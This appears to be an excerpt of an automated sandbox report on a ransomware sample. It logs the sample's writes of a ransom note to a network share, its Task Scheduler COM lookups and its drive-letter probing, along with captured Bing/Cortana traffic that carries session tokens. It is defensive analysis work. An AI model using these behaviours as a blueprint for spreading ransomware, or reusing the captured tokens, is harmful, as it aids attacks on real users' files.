Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000323B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AbcpyDll.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ADelRCP.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bootmgfw.pdbO | source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003243000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\B\127930\Acrobat\Installers\InstEntryPointBlock\Release\InstEntryPointBlock.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: PerfInst.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AcroTgts.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Note: every PDB path above is a symbol path of a third-party binary (Adobe Acrobat and ARM installer components) or of the Windows boot manager, found in memory dumps of the running sample rather than in the sample's own image; no PDB path for 98j0BL6iLT.exe or svhost.exe is listed in this report, so these strings are not build-path indicators for the ransomware and should not be pivoted on as such.

                        Spreading

Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Z:\$RECYCLE.BIN
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Z:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Z:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: Z:\Recovery\WindowsRE\how_to_back_files.html
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Note: {0F87369F-A4E5-4CFC-BD3E-73E6154572DD} is CLSID_TaskScheduler, the Task Scheduler 2.0 (ITaskService) COM server; the 32-bit sample resolves it under WOW6432Node, which is what the "Creates COM task schedule object" signature above refers to. The writes to Z: (the only non-system drive the sample wrote to) are the basis for the "Spreads via windows shares" signature, and how_to_back_files.html is the ransom note. The drive-letter probes that follow are the "Checks for available system drives" signature.
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: z:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: x:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: v:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: t:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: r:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: p:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: n:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: l:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: j:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: h:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: f:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: b:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: y:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: w:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: u:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: s:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: q:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: o:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: m:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: k:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: i:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: g:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: e:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: c:
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File opened: a:
Source: Joe Sandbox View | JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
                        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 
0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 87284Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 
0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 89890Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                        Source: 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.420822378.000000000323B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl
                        Source: 98j0BL6iLT.exe, 00000000.00000003.420822378.000000000323B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evcs-aia.ws.symantec.com/evcs.cer0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evcs-crl.ws.symantec.com/evcs.crl0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evcs-ocsp.ws.symantec.com04
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.flexerasoftware.com0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
